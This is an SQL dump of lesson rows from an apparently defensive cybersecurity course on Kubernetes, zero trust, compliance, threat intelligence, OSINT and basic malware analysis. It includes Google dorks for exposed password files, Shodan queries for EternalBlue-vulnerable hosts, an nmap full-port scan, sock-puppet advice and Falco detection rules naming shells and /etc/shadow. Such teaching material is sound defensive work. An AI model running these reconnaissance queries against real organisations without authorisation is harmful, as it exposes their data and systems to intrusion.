(694, 423, '## Kubernetes Security (K8s)\n\nKubernetes manages thousands of containers. It is complex (\"K8s is hard\").\n\n### 1. The API Server\nThe brain of K8s. Port 6443.\n*   **Attack**: If this is open to the internet with no auth, anyone can delete your cluster.\n*   **Fix**: Private access only.\n\n### 2. RBAC (Role-Based Access Control)\n*   **Service Accounts**: Every pod has an identity.\n*   **Risk**: Default Service Account often has too many permissions.\n*   **Fix**: Create specific ServiceAccounts. \"This Web Pod can ONLY talk to the Database Pod.\"\n\n### 3. Pod Security Standards (PSS)\n*   **Privileged Pods**: A pod with `privileged: true` is basically a root shell on the host.\n*   **Policy**: Use OPA Gatekeeper or Kyverno to **Block** any deployment that asks for `privileged: true`.\n\n### 4. Network Policies\n*   By default, in K8s, **all pods can talk to all pods**. (Flat network).\n*   **Attack**: Hacker compromises Web Pod. Moves laterally to Database Pod easily.\n*   **Fix**: Implement Network Policies (Firewall rules) to deny traffic by default.', 'markdown', 20, '2025-12-27 02:27:22', '2025-12-29 16:15:13'),
(695, 424, '## Container Image Security\n\n\"Supply Chain Security.\"\n\n### Scanning Images\nBefore you deploy, scan the image.\n*   **Tools**: Trivy, Grype, Clair.\n*   **Process**: CI/CD Pipeline.\n    *   Developer commits code.\n    *   Jenkins builds image.\n    *   Trivy scans image.\n    *   If `Critical Vulnerabilities > 0`: **Fail Build**. (Do not deploy).\n    *   Else: Deploy.\n\n### Minimal Base Images\n*   **Bloat**: Using `ubuntu:latest` (700MB) includes Curl, Wget, Netcat, Grep. Hackers love these tools (\"Living off the Land\").\n*   **Minimal**: Using `alpine` (5MB) or Google `distroless`.\n    *   Contains *only* the application binary. No Shell. No Curl.\n    *   *Result*: Beating the hacker by removing their weapons.\n\n### Signing Images (Notary)\nHow do you know this image actually came from your developer and wasn\'t injected by a hacker?\n*   **Cosign / Notary**: Digitally sign images. Kubernetes verifies the signature before running.', 'markdown', 20, '2025-12-27 02:27:22', '2025-12-29 16:15:13'),
(696, 425, '## Runtime Protection\n\nScanning images is \"Static\". We also need \"Dynamic\" protection (EDR for Containers).\n\n### Falco (The Runtime Camera)\n**Falco** is an open-source tool (CNCF) that watches the Kernel.\n*   **Rule**: \"Alert if a Shell is spawned in a container.\"\n*   **Rule**: \"Alert if a container modifies `/etc/shadow`.\"\n*   **Rule**: \"Alert if a container connects to a crypto-mining pool.\"\n\n### Sidecars\nSecurity tools often run as a \"Sidecar\" container next to the main app container in the same Pod. They share the network view and can inspect localhost traffic.\n\n### eBPF (Extended Berkeley Packet Filter)\nThe modern magic technology.\n*   allows running sandboxed programs in the Linux Kernel without changing kernel source code.\n*   **Cilium / Tetragon**: Uses eBPF to monitor network and process execution with near-zero performance overhead.\n*   This is the future of Linux security.', 'markdown', 20, '2025-12-27 02:27:22', '2025-12-29 16:15:13'),
(697, 426, '## Module 42 Review\n*   **Containers**: Shared Kernel = High Risk.\n*   **Roots**: Avoid running as Root.\n*   **Images**: Scan before you run.\n*   **Runtime**: Watch for drift and shells (`Falco`).\n\nNext: Zero Trust (The modern architecture).', 'markdown', 20, '2025-12-27 02:27:22', '2025-12-29 14:24:24'),
(698, 431, '## Zero Trust Principles\n\n\"Never Trust. Always Verify.\"\n\n### The Old Model: Castle and Moat\n*   Hard shell (Firewall). Soft gooey center (Internal Network).\n*   If you VPN in, you are \"Trusted\". You can access everything.\n\n### The Zero Trust Model\n*   Assume the network is **Hostile**.\n*   Assume the attacker is **already inside**.\n*   Therefore: Verify *every single request*.\n    1.  **Identity**: Who are you? (MFA).\n    2.  **Device**: Is your laptop patched? (Health).\n    3.  **Context**: Are you in a weird location?\n    4.  **Resource**: Do you need access to *this specific* file?\n\n### Pillars of Zero Trust (CISA)\n1.  **Identity**: Users.\n2.  **Devices**: Endpoints.\n3.  **Network**: Segmentation.\n4.  **Applications**: Workloads.\n5.  **Data**: Encryption/Tagging.', 'markdown', 20, '2025-12-27 02:28:42', '2025-12-29 16:15:13'),
(699, 432, '## Identity as the Perimeter\n\nThe new firewall is the Login Screen.\n\n### Authentication vs Authorization\n*   **AuthN**: Who are you? (MFA).\n*   **AuthZ**: What can you do? (Roles).\n\n### The Signal\nZero Trust creates a \"Risk Signal\" based on context:\n*   **User**: Is Bob.\n*   **Device**: Corporate Laptop (Managed).\n*   **Location**: Office IP.\n*   **Behavior**: Normal hours.\n*   **Result**: Allow Access.\n\n*   **Change**: Bob logs in from an unmanaged iPad in Russia.\n*   **Result**: Block (even if password is correct).', 'markdown', 20, '2025-12-27 02:28:42', '2025-12-29 14:24:24'),
(700, 433, '## Microsegmentation\n\nThe technique to stop Lateral Movement.\n\n### Concept\nInstead of one big \"Internal\" VLAN, break the network into tiny islands.\n*   **Macro-Segmentation**: VLANs. (HR, Finance, IT).\n*   **Micro-Segmentation**: Host-level firewalls.\n    *   \"Server A can talk to Server B on Port 443.\"\n    *   \"Server A can talk to Server C on Port 3306.\"\n    *   \"Server A **cannot** talk to Server D.\"\n\n### Implementation\n1.  **Tagging**: Map the application flow. \"Web calls App calls DB\".\n2.  **Policy**: Write \"Allow\" rules for valid flows.\n3.  **Default Deny**: Block everything else.\n\n### The Effect\nIf an attacker compromises the Web Server, they are trapped in a small padded cell. They cannot scan the network (blocked). They cannot SSH to the DB (blocked).', 'markdown', 20, '2025-12-27 02:28:42', '2025-12-29 16:15:13'),
(701, 434, '## Continuous Verification\n\nTrust is ephemeral.\n\n### Posture Checks\nBefore granting access, check the device health.\n*   Is the OS patched?\n*   Is EDR running?\n*   Is Disk Encrypted?\nIf NO -> Quarantine the device until fixed.\n\n### Session Times\n*   **Old**: Login lasts 30 days.\n*   **Zero Trust**: Login lasts 1 hour. Or 15 minutes for critical apps.\nRe-verify constantly.', 'markdown', 20, '2025-12-27 02:28:42', '2025-12-29 14:24:24');
INSERT INTO `lesson_content` (`id`, `task_id`, `content`, `content_type`, `reading_time_minutes`, `created_at`, `updated_at`) VALUES
(702, 435, '## Implementation\n\nHow do we actually build this?\n\n1.  **Define Protect Surface**: Identify the critical data (DAAS - Data, Assets, Applications, Services).\n2.  **Map Transaction Flows**: How does data move today? (Who talks to whom?).\n3.  **Build Policy**: Write the \"Allow\" rules based on business need.\n4.  **Monitor**: Watch logs.\n5.  **Enforce**: Turn on blocking mode.\n\n*Warning*: Don\'t turn on blocking on Day 1. You will break production.', 'markdown', 20, '2025-12-27 02:28:42', '2025-12-29 14:24:24'),
(703, 436, '## Module 43 Review\n*   **Identity**: The core control.\n*   **Context**: Time, Device, Location.\n*   **Segmentation**: Keeping zones small.\n\nNext: Compliance (The rules we must follow).', 'markdown', 20, '2025-12-27 02:28:42', '2025-12-29 14:24:24'),
(704, 441, '## Security Frameworks Overview\n\nWhy do we follow frameworks?\n1.  **Guidance**: Don\'t reinvent the wheel. Best practices exist.\n2.  **Compliance**: It\'s the law (or contract).\n3.  **Trust**: Customers trust you if you have a badge (ISO/SOC2).\n\n### Types\n*   **Regulatory**: HIPAA (Health), GDPR (Privacy). Essential.\n*   **Voluntary**: NIST CSF, CIS Controls. Best practice.', 'markdown', 20, '2025-12-27 02:30:07', '2025-12-29 14:24:24'),
(705, 442, '## NIST Cybersecurity Framework (CSF)\n\nThe gold standard for US organizations.\n\n### The 5 Functions\n1.  **Identify**: Asset Management, Risk Assessment. \"Know what you have.\"\n2.  **Protect**: Access Control, Awareness, Data Security. \"Lock the doors.\"\n3.  **Detect**: Anomalies, Monitoring. \"Install cameras.\"\n4.  **Respond**: Mitigation, Analysis. \"Call the fire department.\"\n5.  **Recover**: Planning, Improvements. \"Rebuild.\"\n\n*(2.0 added \"Govern\" as the 6th function).*', 'markdown', 20, '2025-12-27 02:30:07', '2025-12-29 14:24:24'),
(706, 443, '## ISO 27001 & 27002\n\nThe International Standard.\n\n### ISMS (Information Security Management System)\nISO 27001 focuses on the **Management System**, not just the tech.\n*   \"Do you have a process to identify risks?\"\n*   \"Do you have management support?\"\n*   \"Do you continuously improve?\"\n\n### Annex A (Controls)\nList of 114 specific controls (Access Control, Cryptography, Physical Security).\n*   You don\'t have to implement all 114, but you must explain why if you exclude one (Statement of Applicability - SOA).\n\n### Usage\n*   Common in Europe and Asia.\n*   Rigorous certification process.', 'markdown', 20, '2025-12-27 02:30:07', '2025-12-29 16:15:13'),
(707, 444, '## SOC 2 Compliance\n\n**SOC 2 (Service Organization Control 2)** is the gold standard for SaaS companies.\n\n### The Trust Services Criteria (TSC)\n1.  **Security** (Mandatory): Firewalls, IDS, MFA.\n2.  **Availability**: Uptime, DR.\n3.  **Processing Integrity**: Data is accurate.\n4.  **Confidentiality**: Encryption.\n5.  **Privacy**: Consents.\n\n### Type 1 vs Type 2\n*   **Type 1**: \"Design\". A snapshot in time. \"On Jan 1st, they had a firewall.\"\n*   **Type 2**: \"Operating Effectiveness\". Observation over 6-12 months. \"For the entire year, they kept the firewall running and reviewed logs daily.\"\n*   *Note*: Enterprise customers demand SOC 2 Type 2 reports.\n\n### The Analyst\'s Role\nEvidence Collection.\n*   Auditor: \"Prove you review access logs.\"\n*   Analyst: \"Here is the ticket #1234 where I reviewed the logs.\"', 'markdown', 20, '2025-12-27 02:30:07', '2025-12-29 16:15:13'),
(708, 445, '## PCI-DSS & HIPAA\n\n### PCI-DSS (Payment Card Industry Data Security Standard)\n*   **Scope**: Anyone protecting credit card numbers.\n*   **Rules**: Very technical.\n    *   \"Install a firewall.\"\n    *   \"Encrypt data in transit.\"\n    *   \"Use Anti-Virus.\"\n\n### HIPAA (Health Insurance Portability and Accountability Act)\n*   **Scope**: US Healthcare (Hospitals, Insurance).\n*   **Focus**: Protecting PHI (Personal Health Information).\n*   **Rule**: More flexible/vague than PCI, but huge fines for breaches.', 'markdown', 20, '2025-12-27 02:30:07', '2025-12-29 14:24:24'),
(709, 446, '## Module 44 Review\n*   **NIST CSF**: The operational guide (Identify -> Recover).\n*   **ISO 27001**: The management standard.\n*   **SOC 2**: The SaaS standard.\n*   **PCI/HIPAA**: The industry laws.\n\nYou have completed Path 4: Advanced SOC & Threat Hunting.\nYou are now ready to tackle the hardest challenges in Cyber Defense.', 'markdown', 20, '2025-12-27 02:30:07', '2025-12-29 14:24:24'),
(978, 765, '## What is Cyber Threat Intelligence?\n\n**Cyber Threat Intelligence (CTI)** is evidence-based knowledge, including context, mechanisms, indicators, implications, and action-oriented advice about an existing or emerging menace or hazard to assets.\n\nIn simpler terms: **CTI is the art of knowing your enemy.**\n\nIt transforms raw data into a narrative that helps you make better security decisions. It answers questions like:\n*   \"Who is attacking us?\"\n*   \"Why are they attacking us?\"\n*   \"How do they get in?\"\n*   \"What are they after?\"\n\n---\n\n### The Pyramid of Value\nTo understand CTI, you must understand the difference between Data, Information, and Intelligence.\n\n#### 1. Data (The Raw Material)\nData is simple, raw indicators. It has no context.\n*   **Example**: `IP Address: 192.168.1.5` or `Hash: a1b2c3d4...`\n*   **Value**: Low. Seeing an IP address tells you nothing about *why* it is there or if it is bad.\n\n#### 2. Information (Processed)\nInformation is data that has been aggregated or enriched. It answers \"What is this?\"\n*   **Example**: \"The IP `192.168.1.5` belongs to a known VPN provider and was seen scanning port 445 on our firewall.\"\n*   **Value**: Medium. You know what it is, but not if it\'s a targeted threat.\n\n#### 3. Intelligence (Actionable Insight)\nIntelligence is the analysis of information to provide specific direction. It answers \"What should we do?\"\n*   **Example**: \"APT29 is actively using the VPN IP `192.168.1.5` to exploit the Log4j vulnerability in financial institutions to deploy Cobalt Strike. **Recommendation**: Block this IP and patch Log4j immediately.\"\n*   **Value**: High. This captures the intent, the capability, and the necessary action.\n\n> 💡 **Key Takeaway**: If you cannot act on it, it is not intelligence; it is just news.\n\n---\n\n### Why Do We Need CTI?\nMany organizations operate in a functional \"Firefighting\" mode—reacting to alerts as they happen. CTI shifts this to a **Proactive** stance.\n\n#### 1. Proactive Defense (The \"Hunt\")\nInstead of waiting for the SIEM to beep, CTI tells us what to look for. If we know a specific ransomware group uses \"RDP Brute Force\" followed by \"PsExec\", we can go *look* for those signs before the ransomware is deployed.\n\n#### 2. Decision Advantage\nSecurity budgets are finite. CTI helps leaders decide where to spend money.\n*   *Without CTI*: \"We need to fix everything.\" (Impossible).\n*   *With CTI*: \"Our threat landscape is dominated by Phishing and Ransomware. We should invest 80% of our budget in Email Security and Offline Backups, and less on physical security.\"\n\n#### 3. Alert Triage\nA SOC Analyst sees 1,000 alerts a day. Which one matters?\nCTI provides the context. An alert for \"Powershell Execution\" might be normal for a SysAdmin. But CTI tells us: \"This specific Powershell command matches the exact syntax used by the Emotet Trojan.\" Suddenly, that alert becomes Priority 1.\n\n---\n\n### Case Study: The Target Breach (2013)\nOne of the most famous examples of failed intelligence.\n*   **The Attack**: Hackers compromised a third-party HVAC vendor just to get into Target\'s network.\n*   **The Warning**: FireEye (security vendor) detected the malware and flagged it.\n*   **The Failure**: Target\'s security team saw the alert but ignored it because they lacked the **Strategic Intelligence** to understand that retail was being aggressively targeted by POS (Point of Sale) RAM scrapers.\n*   **The Result**: 40 million credit cards stolen. CEO fired.\n*   **Lesson**: Detection tools are not enough. You need the intelligence to understand the *severity* and *context* of what you are seeing.\n\n---\n\n### Summary\n*   **Data** is raw numbers. **Information** is context. **Intelligence** is actionable advice.\n*   CTI moves you from **Reactive** (Firefighting) to **Proactive** (Hunting).\n*   The goal is to reduce risk and speed up response times.', 'markdown', NULL, '2025-12-29 13:30:44', '2025-12-29 13:41:22'),
(979, 766, '## The Intelligence Cycle\n\nIntelligence does not just \"happen.\" It is the result of a rigorous, repeatable process called the **Intelligence Cycle**. This 6-step loop ensures that the intel produced effectively meets the needs of the consumer.\n\n---\n\n### Phase 1: Direction (Planning)\nThis is the most critical phase. Before you collect a single log, you must ask: **\"What do we want to know?\"**\n*   **Defining Requirements**: We create **Intelligence Requirements (IRs)**.\n    *   *Bad IR*: \"Tell me about hackers.\" (Too vague).\n    *   *Good IR*: \"Is our organization vulnerable to the specific ransomware strains currently targeting the healthcare sector?\"\n*   **Stakeholders**: Who needs this? The CISO? The SOC? The Patch team?\n\n### Phase 2: Collection\nGathering the raw data to answer the question.\n*   **Internal Sources**: Firewall logs, EDR telemetry, SIEM events, past incident reports.\n*   **External Sources (OSINT)**: Twitter, Github, News reports, Pastebin.\n*   **Closed Sources**: Dark web forums, paid vendor feeds (e.g., CrowdStrike, Mandiant), ISACs (Information Sharing and Analysis Centers).\n\n### Phase 3: Processing\nRaw data is often unusable (messy, encrypted, or foreign language). Processing turns it into a readable format.\n*   **Normalization**: Converting 10 different log formats into one standard (like JSON or STIX).\n*   **Translation**: Translating Russian forum posts into English.\n*   **Decryption**: Decrypting malware configs.\n*   **Filtering**: Throwing away the noise (false positives) to focus on the signal.\n\n### Phase 4: Analysis\nThis is the \"Brain\" of the operation. Analysts connect the dots.\n*   **Correlation**: \"We saw this file hash in our network, and this report says it belongs to APT28.\"\n*   **Attribution**: \"Based on the TTPs, we assess with High Confidence this is a state-sponsored attack.\"\n*   **Assessment**: \"What does this mean for us?\" The analyst validates the truthfulness of the data and estimates the potential impact.\n*   **Structured Analytic Techniques (SATs)**: Methods like \"Analysis of Competing Hypotheses\" are used to avoid cognitive biases (like Confirmation Bias).\n\n### Phase 5: Dissemination\nDelivering the finished product to the right person, in the right format, at the right time.\n*   **Strategic**: A 1-page PDF summary for the CEO. (No technical jargon).\n*   **Tactical**: A machine-readable list of IOCs (STIX/TAXII) pushed directly to the Firewall.\n*   **Operational**: A detailed report on TTPs for the Threat Hunting team.\n*   **Rule of Thumb**: \"The right intel to the wrong person is useless.\"\n\n### Phase 6: Feedback\nThe cycle closes. Did we answer the question?\n*   \"Was this report helpful?\"\n*   \"Did it lead to a detection?\"\n*   \"Was it too late?\"\n*   Based on feedback, we adjust our **Direction** for the next cycle. If the SOC says \"These IOCs were all false positives,\" we need to change our Collection or Analysis phase.\n\n---\n\n### Summary\nThe cycle never stops. As threats evolve, our requirements change, and the wheel keeps turning.', 'markdown', NULL, '2025-12-29 13:30:45', '2025-12-29 13:41:22'),
(980, 767, '## Types of Threat Intelligence\n\nNot all intelligence is created equal. We categorize CTI into three (sometimes four) main types based on the **Consumer** (who reads it) and the **Horizon** (how long it matters).\n\n---\n\n### 1. Strategic Intelligence\n*   **Audience**: Executives, Board of Directors, CISO.\n*   **Focus**: High-level trends, financial risk, brand reputation, and geopolitics.\n*   **Time Horizon**: Long-term (Years).\n*   **Example Content**:\n    *   \"Ransomware attacks in our industry increased by 200% this quarter.\"\n    *   \"New regulations in the EU will impact our data privacy compliance.\"\n    *   \"The conflict in Region X increases the risk of nation-state cyber retaliation.\"\n*   **Goal**: To inform business decisions, budget allocation, and risk management. **No technical terms.**\n\n### 2. Operational Intelligence\n*   **Audience**: Security Managers, Threat Hunters, Incident Responders.\n*   **Focus**: **TTPs** (Tactics, Techniques, and Procedures). The \"How\" and \"Why\" of an attack.\n*   **Time Horizon**: Mid-term (Weeks to Months).\n*   **Example Content**:\n    *   \"APT29 is using a new technique to bypass Multi-Factor Authentication (MFA).\"\n    *   \"The \'Emotet\' botnet sends phishing emails with subject lines regarding invoices.\"\n    *   \"Adversaries are actively exploiting the PrintNightmare vulnerability.\"\n*   **Goal**: To update security posture, prioritize patching, and guide threat hunting.\n\n### 3. Tactical Intelligence\n*   **Audience**: SOC Analysts, SIEM Administrators, Automated Systems (Firewalls).\n*   **Focus**: **IOCs** (Indicators of Compromise). The specific artifacts left behind.\n*   **Time Horizon**: Short-term (Hours to Days).\n*   **Example Content**:\n    *   **IP Addresses**: `104.22.1.1`\n    *   **File Hashes**: `e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855`\n    *   **Domains**: `evil-phishing-site.com`\n*   **Goal**: Immediate detection and blocking. Tactical intel is often automated because it expires quickly (attackers change IPs cheaply).\n\n---\n\n### Comparison Table\n\n| Feature | Strategic | Operational | Tactical |\n| :--- | :--- | :--- | :--- |\n| **Consumer** | C-Suite / Board | SOC Mgr / Hunters | Analysts / Machines |\n| **Content** | Trends / Risk | TTPs / Campaigns | IOCs (Artifacts) |\n| **Lifespan** | Years | Weeks/Months | Hours/Days |\n| **Volume** | Low | Medium | High |\n| **Automated?** | Never | Rarely | Often |\n\n---\n\n### The \"Fourth\" Type: Technical Intelligence\nSome frameworks include a 4th type focused purely on technical tools and malware analysis results (e.g., \"This malware uses XOR encryption with key 0x55\"). This often blends into Operational/Tactical.\n\n### Scenario: The Ransomware Attack\n*   **Tactical**: The Firewall blocks 10 IPs associated with the C2 server.\n*   **Operational**: The Threat Hunter looks for the \"Double Pulsar\" exploit tool because they know this group uses it.\n*   **Strategic**: The CISO presents a report to the Board requesting $2M for offline backups because reliance on cloud sync is a strategic weakness against this specific threat actor.\n\nAll three types work together to protect the organization.', 'markdown', NULL, '2025-12-29 13:30:45', '2025-12-29 13:41:22'),
(981, 768, '## Module 1 Assessment\nPass this quiz to complete the module.', 'markdown', NULL, '2025-12-29 13:30:45', '2025-12-29 13:30:45'),
(982, 769, '## Open Source Intelligence (OSINT)\n\n**OSINT** is data collected from publicly available sources to be used in an intelligence context. \"Open Source\" does not mean \"Open Source Software\" (like Linux). It means **Publicly Accessible Information (PAI)**.\n\nIf it is on the internet and you can access it without hacking a password, it is OSINT.\n\n---\n\n### The OSINT Landscape\nOSINT is vast. It covers:\n1.  **The Surface Web**: Google, News, Company Websites. (4% of web).\n2.  **The Deep Web**: Content not indexed by Search Engines (Databases, Court Records, Wayback Machine).\n3.  **The Dark Web**: Networks requiring specific software (Tor/I2P) to access. Marketplace for stolen data.\n4.  **Social Media**: Twitter, LinkedIn, Instagram, Reddit.\n5.  **Technical Data**: DNS records, WHOIS, SSL Certificates, IP Geolocation.\n\n---\n\n### Passive vs Active Reconnaissance\nThis distinction keeps you out of jail.\n\n#### Passive Reconnaissance (Safe)\nGathering info **without** interacting directly with the target\'s systems.\n*   **Method**: You query Google, Shodan, or Whois.\n*   **Visibility**: The target sees traffic from Google/Shodan, not YOU.\n*   **Risk**: Near Zero.\n*   *Example*: Searching `site:target.com` on Google.\n\n#### Active Reconnaissance (Risky)\nGathering info by **touching** the target.\n*   **Method**: Port Scanning (Nmap), Vulnerability Scanning (Nessus), connecting to their web server.\n*   **Visibility**: Your IP address appears in their Firewall/Web logs.\n*   **Risk**: High. You can be blocked or flagged as an attacker.\n*   *Example*: Running `nmap -sS -p- target.com`.\n\n---\n\n### OPSEC: Operations Security\n\"If you stare into the abyss, the abyss stares back.\"\nWhen you research a Threat Actor or a malicious domain, you must assume they are watching their logs. If they see a request from \"My-Corporate-Laptop\", they know you are on to them.\n\n#### The Golden Rules of Intelligence OPSEC\n1.  **Never Use Your Real Identity**: Do not use your personal Gmail or corporate email to register for forums.\n2.  **Use a Sock Puppet**: A fake online persona.\n    *   *Name*: Generic but realistic.\n    *   *Photo*: AI Generated (thispersondoesnotexist.com) - avoid reverse image search hits.\n    *   *History*: An empty account looks suspicious. A good sock puppet has months of benign activity.\n3.  **Manage Attribution**:\n    *   **VPN**: Hides your IP.\n    *   **Tor**: Anonymizes your traffic (but beware, Tor exit nodes are public).\n    *   **Virtual Machines (VM)**: Always browse from a disposable VM (like Whonix or Kali). If you get infected, you just delete the VM.\n    *   **User Agents**: Spoof your browser string to blend in.', 'markdown', NULL, '2025-12-29 13:30:45', '2025-12-29 13:43:25'),
(983, 770, '## Infrastructure OSINT\n\nAdversaries need infrastructure to attack you. They need Domains for Phishing and IPs for Command & Control (C2). By analyzing this infrastructure, we can pivot and find more of their network.\n\n---\n\n### 1. WHOIS Data\nWHOIS is the registration record for a domain. It tells you:\n*   **Registrar**: GoDaddy, Namecheap, etc.\n*   **Dates**: Creation Date (New domains are suspicious!), Expiry Date.\n*   **Registrant**: Name, Email, Phone.\n*   **Name Servers**: `ns1.hosting.com`.\n\n> ⚠️ **The GDPR Problem**: Since 2018 (GDPR), most personal WHOIS data is \"Redacted for Privacy\". However, historical WHOIS services (like Whoxy or various paid tools) often cached the record *before* it was redacted.\n\n### 2. DNS Enumeration\nDNS is the phonebook of the internet. We want to find every subdomain associated with a target.\n*   **A Record**: Maps `domain.com` -> `1.2.3.4` (IPv4).\n*   **CNAME Record**: Alias. `blog.target.com` -> `wordpress.com`.\n*   **MX Record**: Mail Exchange. Tells you who hosts their email (e.g., `protection.outlook.com` means they use Microsoft 365).\n*   **TXT Record**: Often reveals trust relationships. `include:sending.service.com` in SPF records tells you they use that vendor for marketing emails.\n\n### 3. Certificate Transparency (CT)\nThis is a goldmine for OSINT.\nWhen a Certificate Authority (like Let\'s Encrypt) issues an SSL/TLS certificate, they MUST publish it to a public **Certificate Transparency Log**.\n*   **Why it helps**: If an attacker sets up `phishing.target-login.com` and gets an SSL cert to make it \"secure\", that hostname appears in the public CT logs **immediately**.\n*   **Tool**: `crt.sh`. Just search `%target.com` to see every sub-domain they have ever secured.\n\n### Pivot Techniques\n*   **Reverse DNS**: \"What other domains are hosted on this IP?\" (Shared hosting vs Dedicated C2).\n*   **Reverse Analytics**: \"What other websites share this Google Analytics ID?\" (Links attacker sites together).\n*   **Reverse WHOIS**: \"Show me all domains registered by `badguy@evil.com`.\"', 'markdown', NULL, '2025-12-29 13:30:45', '2025-12-29 13:43:25'),
(984, 771, '## Social Media Intelligence (SOCMINT)\n\nPeople are the weakest link. They overshare. SOCMINT exploits this to gather intelligence on targets (employees) or threats (hackers).\n\n---\n\n### Key Platforms\n1.  **LinkedIn**: The #1 source for corporate recon.\n    *   *Attacker View*: \"I need to phish the SysAdmin. I\'ll search LinkedIn for `System Administrator` at `Target Company`. Oh, here is Bob. Bob lists `Cisco ASA` in his skills. Now I know they use Cisco firewalls.\"\n2.  **Twitter / X**: Real-time news ticker.\n    *   Security researchers post 0-days here first.\n    *   Hacktivists announce DDoS attacks here.\n    *   *Search*: `(from:user) until:2023-01-01` (Time travel).\n3.  **Telegram**: The modern \"Dark Web\".\n    *   Ransomware groups run public \"News Channels\" to name-and-shame victims.\n    *   Cybercrime markets sell access and tools in group chats.\n\n### Username Enumeration\nWe are creatures of habit. If my handle is `hacker_123` on Reddit, it is probably `hacker_123` on GitHub and Instagram.\n*   **Concept**: Identity Resolution. Connecting a digital persona across different platforms to build a full profile.\n*   **Tool**: **Sherlock** or **WhatsMyName**. These scripts query hundreds of websites: \"Does `user/hacker_123` exist?\"\n\n### HUMINT (Human Intelligence)\nIn the digital world, this means interacting with people to get info.\n*   **Scenario**: An analyst joins a discord server for a hacking tool and asks \"Does this allow persistence?\" to understand its capabilities.\n*   **Risk**: **Extreme**. Interacting with threat actors can legally verify them, tip them off, or violate specific laws (like providing material support if you buy something).\n*   **Policy**: Most SOCs have a strict \"Passive Only\" policy. You can watch, but you cannot talk.', 'markdown', NULL, '2025-12-29 13:30:45', '2025-12-29 13:43:25'),
(985, 772, '## OSINT Tools Workshop\n\nLet\'s get hands-on with the essential toolkit.\n\n### 1. Google Dorking\nUsing advanced search operators to uncover hidden data.\n*   `site:`: Limit results to a domain.\n*   `filetype:`: Look for specific files (pdf, docx, xlsx).\n*   `inurl:`: Look for text in the URL.\n*   `intitle:`: Look for text in the page title.\n\n**recipes**:\n*   *Find Sensitive Files*: `site:target.com filetype:xlsx \"password\"`\n*   *Find Login Portals*: `site:target.com inurl:login`\n*   *Find Open Directories*: `intitle:\"index of /\" \"parent directory\"`\n*   *Public Trello Boards*: `site:trello.com \"password\" OR \"credentials\"`\n\n### 2. Shodan.io\n\"Google for the Internet of Things\". It scans the entire internet (IPv4) 24/7.\n*   **Webcam**: `Server: SQ-WEBCAM`\n*   **Industrial Control Systems**: `port:502` (Modbus)\n*   **RDP (Remote Desktop)**: `port:3389`\n*   **Vulnerability**: `vuln:CVE-2017-0144` (Finds EternalBlue vulnerable hosts).\n*   **Filter**: `org:\"Target Corp\" port:443`\n\n### 3. Maltego\nA link analysis tool used to visualize relationships.\n*   **Input**: A domain (e.g., `google.com`).\n*   **Transform**: A script that runs on the input (e.g., \"To MX Record\").\n*   **Output**: The mail server node.\n*   **Use Case**: Mapping an entire criminal infrastructure from a single email address.\n\n### 4. The Wayback Machine (Archive.org)\nThe internet never forgets.\n*   **Defacement**: See if a site was hacked in the past.\n*   **Job Posts**: Find old job descriptions listing specific software versions that are now vulnerable.\n*   **Deleted Code**: Developers often post secrets (API Keys) to Pastebin or Github and then delete them. Archive sites might catch them.', 'markdown', NULL, '2025-12-29 13:30:45', '2025-12-29 13:43:25'),
(986, 773, '## Module 2 Assessment\nPass this quiz to complete the module.', 'markdown', NULL, '2025-12-29 13:30:45', '2025-12-29 13:30:45'),
(987, 774, '## Introduction to Malware Analysis\n\nMalware Analysis is the study of malicious software. Our goal is to understand:\n1.  **Capability**: What can this malware do? (Steal passwords? Encrypt files?).\n2.  **Indicators**: How can we detect it? (Files created, network traffic).\n3.  **Attribution**: Who wrote it? (Rarely successful, but possible).\n\n---\n\n### Static Analysis (Safe & Fast)\nAnalyzing the file **without executing it**. It is like looking at a bomb through an X-ray machine.\n*   **Pros**: Safe. Fast. Can analyze \"dead\" malware (C2 is offline).\n*   **Cons**: Modern malware is \"packed\" (obfuscated) and hides its secrets until runtime.\n*   **Techniques**:\n    *   File Hashing (Fingerprinting).\n    *   Strings Analysis (Finding text).\n    *   PE Header Analysis (Import Table - what DLLs does it need?).\n\n### Dynamic Analysis (Risky & Detailed)\n**Running** the malware in a controlled environment (Sandbox) to watch it explode.\n*   **Pros**: Shows true behavior. Unpacks itself automatically.\n*   **Cons**: Risk of infection/escape. Some malware detects the sandbox and \"plays dead\" (Anti-VM techniques).\n*   **Techniques**:\n    *   Process Monitoring (ProcMon).\n    *   Network Sniffing (Wireshark/Fiddler).\n    *   Registry Watchers.\n\n### The Golden Rule\n**NEVER** analyze malware on your host machine.\n**ALWAYS** use an isolated Virtual Machine (VM) with no shared folders and (preferably) a routed network interface that simulates the internet (like INetSim).', 'markdown', NULL, '2025-12-29 13:38:32', '2025-12-29 13:43:25'),
(988, 775, '## Key Indicators: Strings & Hashes\n\nThis is \"Basic Static Analysis\". It takes 5 minutes and solves 50% of cases.\n\n### 1. File Hashing\nA hash is a one-way mathematical fingerprint changes. If you change 1 bit of the file, the hash changes completely.\n*   **MD5**: 32 chars. Fast. Broken (Collisions possible). OK for database lookups.\n*   **SHA-256**: 64 chars. Standard. Unique.\n*   **Workflow**:\n    1.  Get Sample.\n    2.  `sha256sum malware.exe`.\n    3.  Paste hash into **VirusTotal.com**.\n    4.  If 50/70 vendors say \"Malicious\", you are done.\n\n### 2. Strings Analysis\nProgrammers leave text in code: URLs, IP addresses, Error Messages, Passwords.\nThe `strings` command extracts all ASCII and Unicode readable text.\n*   **Suspicious Strings**:\n    *   `CreateRemoteThread` (Used for Injection).\n    *   `URLDownloadToFile` (Dropper behavior).\n    *   `192.168.x.x` (Internal IPs).\n    *   `cmd.exe /c` (Command execution).\n    *   `C:UsersTarget...` (PDB Paths showing the author\'s username!).\n\n### 3. Packing & Entropy\nMalware authors \"Pack\" their code (like a ZIP file) to hide these strings from antivirus.\n*   **Entropy**: Randomness.\n*   **Low Entropy**: Standard English text (lots of repeated patterns like \"the\").\n*   **High Entropy**: Encrypted or Compressed data (looks like random noise).\n*   **Detection**: If a file has Entropy > 7.0 (out of 8), it is likely Packed. You won\'t see any strings until you unpack it.', 'markdown', NULL, '2025-12-29 13:38:32', '2025-12-29 13:43:25'),
(989, 776, '## Module 3 Assessment', 'markdown', NULL, '2025-12-29 13:38:32', '2025-12-29 13:38:32'),
